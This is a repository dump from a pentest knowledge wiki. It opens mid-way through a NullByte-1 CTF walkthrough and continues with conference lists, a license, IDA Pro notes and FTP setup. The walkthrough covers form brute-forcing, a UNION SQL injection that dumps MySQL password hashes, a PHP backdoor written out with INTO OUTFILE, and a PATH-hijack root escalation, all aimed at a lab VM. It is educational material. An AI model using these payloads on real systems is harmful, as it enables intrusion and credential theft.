| Background Color : 0 130 | Comment : url -> S0tLMG9hc3F3YXc= 131 | Image Size : 235x302 132 | Megapixels : 0.071 133 | ``` 134 | 135 | Woo, url is here. 136 | 137 | ``` 138 | ┌─[lab@core]─[/tmp] 139 | └──╼ printf S0tLMG9hc3F3YXc= | base64 -d 140 | KKK0oasqwaw 141 | ``` 142 | 143 | open http://192.168.10.32/KKK0oasqwaw/, messages as follow: 144 | 145 | ``` 146 | Notices: 147 | 148 | If you can understood the string, you can be to the next level. 149 | It may be a name, a password , a url or something else. 150 | ------------------------------------------------------------------------------------------------------------------------------------- 151 | 152 | MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA= 153 | ``` 154 | 155 | decode the string, we can get: 156 | 157 | ``` 158 | ┌─[lab@core]─[/tmp] 159 | └──╼ printf MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA= | base64 -d 160 | 2e2e2e2e202e2e2e2e2d202e2d2e202d2e2e202e2d2d202d2d2d2d2d202e2d2e202d2e2d20 161 | ┌─[lab@core]─[/tmp] 162 | └──╼ printf MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA= | base64 -d | unhex 163 | .... ....- .-. -.. .-- ----- .-. -.- 164 | ``` 165 | 166 | This is "Morse code". Decode it and get string "h4rdw0rk". What's the meaning ? 167 | - "It may be a name, a password , a url or something else." 168 | 169 | we find url "http://192.168.10.32/KKK0oasqwaw/h4rdw0rk.php", enter "password". The page shows us "invalid key". 170 | 171 | 172 | 3. **Crack HTTP Form** 173 | 174 | Choose your favorite tool to crack, For example: Burpsuite / Hydra. 175 | 176 | The password is "password1". 177 | 178 | If password is correct, page shows "Enter username". 179 | 180 | 181 | 4. **SQL Injection** 182 | 183 | Enter username "'", 184 | 185 | ``` 186 | http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch=' 187 | ``` 188 | 189 | Fetched data successfully 190 | 191 | 192 | Enter username '"', 193 | 194 | ``` 195 | http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch=" 196 | ``` 197 | 198 | Error Message: 199 | 200 | **Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1** 201 | 202 | 203 | Finally, we can get mysql root user as follow: 204 | 205 | ``` 206 | http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch=" union select 1,2,concat(user, 0x7c, password) from mysql.user-- # 207 | ``` 208 | 209 | we get username and password hash, 210 | 211 | ``` 212 | EMP ID :1 213 | EMP NAME : ramses 214 | EMP POSITION : 215 | -------------------------------- 216 | EMP ID :2 217 | EMP NAME : isis 218 | EMP POSITION : employee 219 | -------------------------------- 220 | EMP ID :1 221 | EMP NAME : 2 222 | EMP POSITION : root|*18DC78FB0C441444482C7D1132C7A23D705DAFA7 223 | -------------------------------- 224 | EMP ID :1 225 | EMP NAME : 2 226 | EMP POSITION : debian-sys-maint|*BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC 227 | -------------------------------- 228 | EMP ID :1 229 | EMP NAME : 2 230 | EMP POSITION : phpmyadmin|*18DC78FB0C441444482C7D1132C7A23D705DAFA7 231 | -------------------------------- 232 | Fetched data successfully 233 | ``` 234 | 235 | crack the hash on site [hashkiller](http://www.hashkiller.co.uk/). 236 | 237 | ``` 238 | root:sunnyvale 239 | ``` 240 | 241 | 5. **Upload Backdoors** 242 | 243 | login phpmyadmin with "root:sunnyvale", upload your php backdoor to uploads (/var/www/html/uploads) with sql query: 244 | 245 | ``` 246 | select "" into outfile "/var/www/html/uploads/phpinfo.php"; 247 | select "" into outfile "/var/www/html/uploads/cmd.php" 248 | ``` 249 | 250 | Get os shell with msf 251 | 252 | ``` 253 | www-data@NullByte:/var/www/backup$ echo $PATH 254 | /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 255 | www-data@NullByte:/var/www/backup$ PATH="/var/www/backup:$PATH" 256 | www-data@NullByte:/var/www/backup$ echo $PATH 257 | /var/www/backup:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 258 | www-data@NullByte:/var/www/backup$ ln -s /bin/sh ps 259 | www-data@NullByte:/var/www/backup$ ./procwatch 260 | # id 261 | uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) 262 | # cd /root 263 | # ls -l 264 | total 4 265 | -rw-r--r-- 1 root root 1170 Aug 2 01:45 proof.txt 266 | # cat proof.txt 267 | adf11c7a9e6523e630aaf3b9b7acb51d 268 | 269 | It seems that you have pwned the box, congrats. 270 | Now you done that I wanna talk with you. Write a walk & mail at 271 | xly0n@sigaint.org attach the walk and proof.txt 272 | If sigaint.org is down you may mail at nbsly0n@gmail.com 273 | 274 | 275 | USE THIS PGP PUBLIC KEY 276 | 277 | -----BEGIN PGP PUBLIC KEY BLOCK----- 278 | Version: BCPG C# v1.6.1.0 279 | 280 | mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ 281 | Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT 282 | e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq 283 | Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK 284 | +z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe 285 | YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu 286 | Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS 287 | HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q 288 | m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn 289 | XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58 290 | kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8 291 | TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU 292 | Gms= 293 | =PiAQ 294 | -----END PGP PUBLIC KEY BLOCK----- 295 | 296 | ``` 297 | 298 | -------------------------------------------------------------------------------- /CTFS/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > 2 | 3 | ---- 4 | 5 | # CTFS & PentestLab 6 | 7 | The stronger you want to become, the more exercises you need. 8 | 9 | # Links 10 | 11 | 1. https://www.vulnhub.com/ 12 | 2. https://www.pentesterlab.com/ 13 | 3. http://www.amanhardikar.com/mindmaps/Practice.html 14 | 4. http://r-7.co/Metasploitable2 15 | -------------------------------------------------------------------------------- /Information-Security-Conferences/README.md: -------------------------------------------------------------------------------- 1 | ## Information Security Conferences 2 | 3 | - [DEF CON](https://www.defcon.org/) - An annual hacker convention in Las Vegas 4 | - [Black Hat](http://www.blackhat.com/) - An annual security conference in Las Vegas 5 | - [BSides](http://www.securitybsides.com/) - A framework for organising and holding security conferences 6 | - [CCC](https://events.ccc.de/congress/) - An annual meeting of the international hacker scene in Germany 7 | - [DerbyCon](https://www.derbycon.com/) - An annual hacker conference based in Louisville 8 | - [PhreakNIC](http://phreaknic.info/) - A technology conference held annually in middle Tennessee 9 | - [ShmooCon](http://shmoocon.org/) - An annual US east coast hacker convention 10 | - [CarolinaCon](http://www.carolinacon.org/) - An infosec conference, held annually in North Carolina 11 | - [CHCon](https://chcon.nz) - Christchurch Hacker Con, held annually in New Zealand 12 | - [SummerCon](http://www.summercon.org/) - One of the oldest hacker conventions, held during Summer 13 | - [Hack.lu](https://2016.hack.lu/) - An annual conference held in Luxembourg 14 | - [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands 15 | - [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany 16 | - [Hack3rCon](http://hack3rcon.org/) - An annual US hacker conference 17 | - [ThotCon](http://thotcon.org/) - An annual US hacker conference held in Chicago 18 | - [LayerOne](http://www.layerone.org/) - An annual US security conference held every spring in Los Angeles 19 | - [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria 20 | - [SkyDogCon](http://www.skydogcon.com/) - A technology conference in Nashville 21 | - [SECUINSIDE](http://secuinside.com) - Security Conference in [Seoul](https://en.wikipedia.org/wiki/Seoul) 22 | - [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania 23 | - [AppSecUSA](https://appsecusa.org/) - An annual conference organised by OWASP 24 | - [BruCON](http://brucon.org) - An annual security conference in Belgium 25 | - [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK 26 | - [Nullcon](http://nullcon.net/website/) - An annual conference in Delhi and Goa, India 27 | - [RSA Conference USA](https://www.rsaconference.com/) - An annual security conference in San Francisco, California, USA 28 | - [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - An annual security conference in Lucerne, Switzerland 29 | - [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - An annual conference going to be held in Denver, USA for 2016 30 | - [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina 31 | - [44Con](https://44con.com/) - Annual Security Conference held in London 32 | - [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annualy held in Novi Sad, Serbia 33 | - [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia 34 | - [SyScan360](https://www.syscan360.org/) - SyScan360 is a well-known Information Security Conference in Asia. 35 | - [KCon](http://kcon.knownsec.com/) - KCon is a famous Hacker Con powered by Knownsec Team. 36 | - [SecTor](https://sector.ca) - An annual Canada's Premier Security Conference held in Toronto 37 | - [HackFest](https://hackfest.ca/en/) - Largest hacking event in Canada, held annualy in Quebec City 38 | - [Steelcon](https://www.steelcon.info/) - Annual security conference held in Sheffield UK (Also runs kids track) 39 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Vex Woo 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [m1guelpf](https://github.com/m1guelpf) >, < [binarymist](https://github.com/binarymist) > 2 | 3 | ---- 4 | 5 | [![pentest-wiki](https://img.shields.io/badge/PENTEST-WIKI-black.svg)](https://github.com/nixawk/pentest-wiki) is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others. 6 | 7 | ## Contents 8 | 9 | - [![](https://img.shields.io/badge/Information%20Security%20Conferences-Index-blue.svg)](./Information-Security-Conferences) 10 | 11 | - [![](https://img.shields.io/badge/Information%20Gathering-Index-blue.svg)](./1.Information-Gathering) 12 | 13 | - Network Analysis 14 | - IP 15 | - [Whois](1.Information-Gathering/How-to-gather-Whois-Information-Gathering.md) 16 | - [DNS](./1.Information-Gathering/How-to-gather-dns-information.md) 17 | - Identify Live Hosts 18 | - IDS/IPS Identification 19 | 20 | - Web Application 21 | - Web Application Fingerprint 22 | - CMS Identification 23 | - Open Source Analysis 24 | - IDS/IPS Identification 25 | 26 | - OSINT 27 | - GHDB 28 | - People 29 | - Pictures 30 | - Media 31 | - Company 32 | - Document 33 | 34 | - [![](https://img.shields.io/badge/Vulnerability%20Assessment-Index-blue.svg)](./2.Vulnerability-Assessment) 35 | 36 | - Vulnerability Scanners 37 | - Network Assessment 38 | - Web Application Assessment 39 | - [OWASP CheatSheetSeries](https://github.com/OWASP/CheatSheetSeries/tree/master/cheatsheets) 40 | - Database Assessment 41 | - [MongoDB](./2.Vulnerability-Assessment/Database-Assessment/mongodb/mongodb_hacking.md) 42 | - [MySQL](./2.Vulnerability-Assessment/Database-Assessment/mysql) 43 | - [Postgresql](./2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md) 44 | - [Sqlite](./2.Vulnerability-Assessment/Database-Assessment/sqlite/sqlite_hacking.md) 45 | 46 | - Mobile Assessment 47 | - [Android](./2.Vulnerability-Assessment/Android-Assessment) 48 | - [OWASP-MASVS](https://github.com/OWASP/owasp-masvs) 49 | - [OWASP-MSTG](https://github.com/OWASP/owasp-mstg/) 50 | - OS Assessment 51 | - [Mac OSX](./2.Vulnerability-Assessment/OS-Assessment/OSX) 52 | 53 | 54 | - [![](https://img.shields.io/badge/Exploitation%20Tools-Index-blue.svg)](./3.Exploitation-Tools) & [![](https://img.shields.io/badge/Post%20Exploitation-Index-blue.svg)](./4.Post-Exploitation) 55 | - Network Exploitation 56 | - [Vulnerable Ports List](./3.Exploitation-Tools/Network-Exploitation/ports_number.md) 57 | - [Cisco ASA CVE-2016-6366](./4.Post-Exploitation/How-to-hack-Cisco-ASA-with-CVE-2016-6366.md) 58 | - OS Exploitation 59 | - Windows 60 | - [Windows 2008 Active Directory Hacking](./4.Post-Exploitation/Windows_ActiveDirectory/Hacking_Windows_Active_Directory.md) 61 | - [Windows 2012 Credentials dump](./4.Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md) 62 | - [Metasploit - run vbs payload in cmd.exe](./4.Post-Exploitation/Windows_ActiveDirectory/Execute_metasploit_vbs_payload_in_cmd_shell.md) 63 | - [Windows Vssadmin](./4.Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md) 64 | - Web Exploitation 65 | - Database Exploitation 66 | - Wireless Exploitation 67 | - Social Engineering 68 | - Physical Exploitation 69 | - Open Source Exploitation 70 | 71 | - [![](https://img.shields.io/badge/Privilege%20Escalation-Index-blue.svg)](./5.Privilege-Escalation) 72 | - Password Attacks 73 | - Privilege Escalation Media 74 | - [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) 75 | - [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 76 | 77 | - Protocol Analysis 78 | - Spoofing Analysis 79 | 80 | - [![](https://img.shields.io/badge/Maintaining%20Access-Index-blue.svg)](./6.Maintaining-Access) 81 | - OS Backdoors 82 | - Tunneling 83 | - Web Backdoors 84 | 85 | - [![](https://img.shields.io/badge/Reporting-Index-blue.svg)](./7.Reporting) 86 | - [Public pentesting reports](https://github.com/juliocesarfort/public-pentesting-reports) 87 | 88 | - [![](https://img.shields.io/badge/Books-Index-blue.svg)](./Books) 89 | - [Penetration Testing Books](./Books/README.md#penetration-testing-books) 90 | - [Hackers Handbook Series](./Books/README.md#hackers-handbook-series) 91 | - [Defensive Development](./Books/README.md#defensive-development) 92 | - [Network Analysis Books](./Books/README.md#network-analysis-books) 93 | - [Reverse Engineering Books](./Books/README.md#reverse-engineering-books) 94 | - [Malware Analysis Books](./Books/README.md#malware-analysis-books) 95 | - [Windows Books](./Books/README.md#windows-books) 96 | - [Social Engineering Books](./Books/README.md#social-engineering-books) 97 | - [Lock Picking Books](./Books/README.md#lock-picking-books) 98 | - [OSINT Books](./Books/README.md#osint-books) 99 | 100 | - [![](https://img.shields.io/badge/CTFs-Index-blue.svg)](./CTFS) 101 | - [Flick](./CTFS/Flick) 102 | - [Nebula](./CTFS/Nebula) 103 | - [NullByte-1](./CTFS/NullByte/NullByte-1.md) 104 | 105 | - [![](https://img.shields.io/badge/Reverse%20Engineering-Index-blue.svg)](./Reverse-Engineering) 106 | 107 | - [![](https://img.shields.io/badge/System%20Services-Index-blue.svg)](./System-Services) 108 | - [FTP](./System-Services/services/service-ftp.md) 109 | - [HTTP](https://gist.github.com/willurd/5720255) 110 | 111 | ## How to contribute 112 | 113 | 1. Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug. 114 | 2. Fork [the repository](https://github.com/nixawk/pentest-wiki) on GitHub to start making your changes to the **master** branch (or branch off of it). 115 | 3. Send a pull request and bug the maintainer until it gets merged and published. 116 | 117 | ## Links 118 | - [The Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines) 119 | - [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) 120 | - [How To Become A Hacker](http://www.catb.org/esr/faqs/hacker-howto.html) 121 | - [Github - awesome-pentest](https://github.com/enaqx/awesome-pentest) 122 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/Background_Analysis.md: -------------------------------------------------------------------------------- 1 | 2 | ## Background Analysis 3 | 4 | IDA can analyze a program when it is not occupied performing an action you prompted. You disassemble a program together with IDA, but your requests have priority. 5 | 6 | The state of background analysis is shown on the upper right-hand corner of the screen. 7 | 8 | You can disable autoanalysis, but in this case some functions of IDA will produce strange results (e.g. if you try to convert data into instructions, IDA will NOT trace all the threads of control flow and the data will be converted into instructions only on the screen...) 9 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/Command_line_swithes.md: -------------------------------------------------------------------------------- 1 | 2 | ## Command line swithes 3 | 4 | ![](https://github.com/all3g/exploit-exercises/blob/master/IDA/IDA-command-line-options.png) 5 | 6 | IDA can be launched with one of the following command lines: 7 | 8 | - idaq input-file (All platforms: start graphical interface) 9 | - idaw input-file (Windows: start text interface) 10 | - idal input-file (Linux/Mac: start text interface) 11 | 12 | Add the '64' postfix to the command name in order to start the 64-bit version of IDA. For example: 13 | 14 | ```idaq64 input-file``` 15 | 16 | will start 64-bit graphical interface. 17 | 18 | The following command line switches are recognized: 19 | 20 | ``` 21 | -a disable auto analysis 22 | -A autonomous mode. IDA will not display dialog boxes. 23 | Designed to be used together with -S switch. 24 | -b#### loading address, a hexadecimal number, in paragraphs 25 | (a paragraph is 16 bytes) 26 | -B batch mode. IDA will generate .IDB and .ASM files automatically 27 | -c disassemble a new file (delete the old database) 28 | -ddirective 29 | A configuration directive which must be processed at the first 30 | pass. Example: 31 | -dVPAGESIZE=8192 32 | -Ddirective 33 | A configuration directive which must be processed at the second 34 | pass. 35 | -f disable FPP instructions (IBM PC only) 36 | -h help screen 37 | -i#### program entry point (hex) 38 | -I# set IDA as just-in-time debugger (0 to disable and 1 to enable) 39 | -L#### name of the log file 40 | -M disable mouse (text only) 41 | -O#### options to pass to plugins 42 | -o#### specify the output database (implies -c) 43 | -p#### processor type 44 | -P+ compress database (create zipped idb) 45 | -P pack database (create unzipped idb) 46 | -P- do not pack database (not recommaned, see Abort command) 47 | -r### immediately run the built-in debugger 48 | format of this switch is explained here 49 | -R load MS Windows exe file resources 50 | -S### Execute a script file when the database is opened. 51 | The script file extension is used to determine which extlang will run the script. 52 | It is possible to pass command line arguments after the script name. 53 | For example: -S"myscript.idc argument1 \"argument 2\" argument3" 54 | The passed parameters are stored in the "ARGV" global IDC variable. 55 | Use "ARGV.count" to determine the number of arguments. 56 | The first argument "ARGV[0]" contains the script name 57 | -T### interpret the input file as the spwecified file type 58 | The file type is specified as a prefix of a file type 59 | visible in the 'load file' dialog box 60 | -t create an empty database. 61 | -W### specify MS Windows directory 62 | -x do not create segmentation 63 | (used in pair with Dump database command) 64 | this switch affects EXE and COM format files only. 65 | -z debug: 66 | 00000001 drefs 67 | 00000002 offsets 68 | 00000004 first 69 | 00000008 idp module 70 | 00000010 idr module 71 | 00000020 plugin module 72 | 00000040 ids files 73 | 00000080 config file 74 | 00000100 check heap 75 | 00000200 checkarg 76 | 00000400 demangler 77 | 00000800 queue 78 | 00001000 rollback 79 | 00002000 already data or code 80 | 00004000 type system 81 | 00008000 show all notifications 82 | 00010000 debugger 83 | 00200000 Appcall 84 | 00400000 source-level debugger 85 | -? this screen (works for the next version) 86 | ? this screnn (works for the next version) 87 | ``` 88 | 89 | For batch mode, IDA must be invoked with the following command line: 90 | 91 | ```idaq -B input-file``` 92 | 93 | which is equivalent to 94 | 95 | ```idaq -c -A -Sanalysis.idc input-file``` 96 | 97 | The text interface (idaw.exe/idal) is better for batch mode because it uses less system resources. Howeveer, please note that regular plugins are not automatically loaded in batch mode because the analysis .idc file quits and the kernel has no chance to load them. 98 | 99 | For more information, please see the analysis.idc file in the IDC subdirectory. 100 | 101 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/IDA-command-line-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/IDA-command-line-options.png -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/Instant_debugger.md: -------------------------------------------------------------------------------- 1 | 2 | ## Instant debugger 3 | 4 | The -r command line switch is used to run the built-in debugger without creating a database in advance. The format is this switch is: 5 | 6 | ```-rdebname{params}:pass@hostname:port+pid``` 7 | 8 | The explanation of the fields: 9 | 10 | debname Debugger name. Should contain the debugger 11 | module name. Examples: win32, linux. This prefix 12 | can be shortened or even completely 13 | omitted if there is no ambiguity 14 | params Optional parameter for the debugger module 15 | The parameters from the appropriate configuation file 16 | can be specified here, separated by semicolons. 17 | pass Password for the remote debugger server 18 | hostname Host name or address of the remote debugger server 19 | port Port number to use to connect to the debugger server 20 | pid PID of the process to attach 21 | 22 | All fields except the first one are optional. See examples below for typical command lines: 23 | 24 | ``` 25 | idaq -rwin32 file args 26 | Run 'file' with command line 'args' in the local debugger 27 | We have to specify the debugger name to avoid ambiguities. 28 | idaq -rwindbg+450 29 | Attach to process 450 on the local machine using the windbg backend 30 | idaq -rl:password@mycom:4567+ 31 | Connect to the remote linux computer 'mycom' at port 4567 using the 32 | password 'password' and display the list of processes running on it. 33 | Allow the user to select a process and attach to it. 34 | idaq -rl@mycom /bin/ls e* 35 | Run '/bin/ls' command on the 'mycom' computers using the 36 | remote linux debugger server. Use an empty password and the 37 | default port number. IDA will extract the name of the 38 | executable from the whobase.idb file in the local current 39 | directory. If the database does not exist, then this command 40 | will fail. 41 | idaq "-rwindbg{MODE=1}@com:port=\\.\pipe\com_1,baud=115200,pipe,reconnect+" 42 | Attach using windbg in kernel mode. The connection starting is 43 | "com:port=\\.\pipe\com_1,baud=115200,pipe,reconnect". A mini database 44 | will be created on the fly. 45 | ``` 46 | 47 | When the -r switch is used, IDA works with the databases in the following way: 48 | 49 | - if a database corresponding to the input file exists and the -c switch has not been specified, then IDA will use the database during the debugging session 50 | - otherwise, a temporary database will be created 51 | 52 | Temporary databases contain only meta-information about the debugged process and not memory contents. The user can make a memory snpshot any time before the process stops. If IDA detects that a command will cause the process to exit or detach IDA, it will purpose to make a snapshot. 53 | 54 | The rest of the command line is passed to the launched process. 55 | 56 | In the case there is no input file (when attaching to existing process, for example), then the temporary database is created in the standard temporary directory. For Windows, this directory is usually "Local Setting\Temp" in the user profile directory. 57 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/Main_Idea.md: -------------------------------------------------------------------------------- 1 | 2 | ## Main Idea 3 | 4 | IDA is an interactive disassembler, which means that the user takes active participation in the disassembly process. IDA is not an automatic analyzer of programs. IDA will give you hints about suspicious instructions, unsolved problem etc. It is your job to inform IDA how to proceed. 5 | 6 | If you are using IDA for the very first time, here are some commands that you will find very useful: 7 | 8 | - convert to instruction : the hotkey is "C" 9 | - convert to data : the hotkey is "D" 10 | 11 | All the changes that you made are saved to disk. When you run IDA again, all the information on the file being diassembled is read from the disk, so that you can rescue your work. 12 | 13 | ``` 14 | CODE:00401000 6A 00 push 0 15 | CODE:00401002 E8 64 02 00 00 call GetModuleHandleA ; Call Procedure 16 | ``` 17 | 18 | Press Key `D`, and you will see: 19 | 20 | ``` 21 | CODE:00401000 6A 00 push 0 22 | CODE:00401000 ; --------------------------------------------------------------------------- 23 | CODE:00401002 E8 db 0E8h 24 | CODE:00401003 64 db 64h ; d 25 | CODE:00401004 02 db 2 26 | CODE:00401005 00 db 0 27 | CODE:00401006 00 db 0 28 | CODE:00401007 ; --------------------------------------------------------------------------- 29 | ``` 30 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/Plugin_Options.md: -------------------------------------------------------------------------------- 1 | 2 | ## Plugin Options 3 | 4 | The -O command line switch allows the user to pass options to the plugins. A plugin which uses options should call the get_plugin_options() function to get them. 5 | 6 | Since there may be plugins written by independent programmers, each options will have a prefix -O in front of the plugin name. 7 | 8 | For example, a plugin named "decomp" should expect its parameters to be in the following format: 9 | 10 | -Odecomp:option1:option2:option3 11 | 12 | In this case, get_plugin_options("decomp") will return the "option1:option2:option3" part of the options string. 13 | 14 | If there are serval -O options in the command line, they will be concatenated with ':' between them. 15 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/The_Names_Windows.md: -------------------------------------------------------------------------------- 1 | 2 | ## The Names Window 3 | 4 | The Names window, provides a summary listing of all of the global names within a binary. A name is nothing more than a symbolic description given to a program virtual address. IDA initially derives the list of names from symbol-table and signature analysis during the initial loading of a file. Names can be sorted alphabetically or in virtual address order (either ascending or descending). The Names window is useful for rapidly navigating to known locations within a program listing. Double-clicking any Names window entry will immediately jump the disassembly view to display the selected name. 5 | 6 | Displayed names are both color and letter coded. The coding scheme is summaried below: 7 | 8 | - **F** A regular function. These are functions that IDA does not recognize as library functions. 9 | - **L** A library function. IDA recognizes library functions through the use of signature-matching algoriths. If a signature does not exist for a given library function, the function will be labeled as a regular function instead. 10 | - **I** An imported name, most commonly a function name imported from a shared library. The different between this and a library function is that no code is present for an imported name, while the body of a library function will be present in the disassembly. 11 | - **C** Named code*. These are named program instruction locations that IDA does not consider to be part of any function. This is posible when IDA finds a name in a program's symbol table but never sees a call to the corresponding program location.. 12 | - **D** Data. Named data locations typically represent global variables. 13 | - **A** String data. This is a referenced data location containing a sequence of characters that conform to one of IDA's known string data types, such as a null-terminated ASCII C string. 14 | 15 | 16 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/TiGa-vid1_reverseMe/Keyfile.dat: -------------------------------------------------------------------------------- 1 | GGGGGGGG 2 | -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.exe -------------------------------------------------------------------------------- /Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/TiGa-vid1_reverseMe/TiGa-vid1_reverseMe.idb -------------------------------------------------------------------------------- /Reverse-Engineering/Reverse_Engineering_for_Beginners-en.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/Reverse_Engineering_for_Beginners-en.pdf -------------------------------------------------------------------------------- /Reverse-Engineering/The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf -------------------------------------------------------------------------------- /System-Services/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Services 6 | 7 | How to install/manage system services ? 8 | 9 | # Links 10 | 11 | 1. https://gist.github.com/willurd/5720255 12 | 2. https://github.com/nixawk/bash-programming/tree/master/kali 13 | -------------------------------------------------------------------------------- /System-Services/services/service-ftp.md: -------------------------------------------------------------------------------- 1 | 2 | ## How to setup a ftp server quickly 3 | 4 | Pleaes install [**pyftpdlib**](https://github.com/giampaolo/pyftpdlib) with pip or easy_install. 5 | 6 | ``` 7 | sudo easy_install pysendfile 8 | sudo easy_install pyftpdlib 9 | ``` 10 | 11 | or 12 | 13 | ``` 14 | sudo pip2 install pysendfile 15 | sudo pip2 install pyftpdlib 16 | ``` 